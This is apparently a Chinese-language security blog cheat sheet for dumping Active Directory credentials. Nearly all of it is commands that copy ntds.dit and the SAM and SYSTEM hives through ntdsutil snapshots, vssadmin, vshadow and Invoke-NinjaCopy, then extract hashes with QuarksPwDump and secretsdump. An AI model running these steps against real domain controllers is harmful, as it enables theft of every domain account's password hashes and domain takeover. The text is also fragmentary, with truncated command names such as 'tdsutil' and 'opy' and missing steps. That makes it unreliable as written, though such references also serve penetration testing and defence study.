「打給賀,挖西飛飛,今天你要來點 Active Directory Security 嗎?」
C:\windows\ntds\ntds.dit
tdsutil snapshot "List All" quit quit
tdsutil snapshot "List Mounted" quit quit
``
(2) 建立快照(會取得 GUID)
- 會有 EventID 98
``
tdsutil snapshot "activate instance ntds" create quit quit
``
(3) 掛載(mount)快照(需使用第二步驟取得的GUID)
- 會取得快照掛載的路徑如 `C:\$SNAP_202210121012_VOLUMEC$\`
``
tdsutil snapshot "mount {GUID}" quit quit
``
(4) 複製 ntds.dit
``
opy C:\$SNAP_202210121012_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
``
(5) 卸載(unmount)快照
``
tdsutil snapshot "unmount {GUID}" quit quit
``
(6) 刪除快照
``
tdsutil snapshot "delete {GUID}" quit quit
``
vssadmin list shadows
: 列出硬碟中的快照vssadmin list writers
: 列出已訂閱的寫入器vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\快照路徑\windows\NTDS\ntds.dit c:\ntds.dit
vssadmin delete shadows /for=c: /quiet
vshadow.exe -q
vshadow.exe -p -nw C:
copy Shadow copy device name\windows\NTDS\ntds.dit c:\ntds.dit
vshadow -dx={SnapshotSetID}
vshadow -ds={SnapshotID}
vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:
Import-Module .\invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"
esentutl /p /o ntds.dit
QuarksPwDump.exe --dump-hash-domain --output password.txt --ntds-file c:\ntds.dit
secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL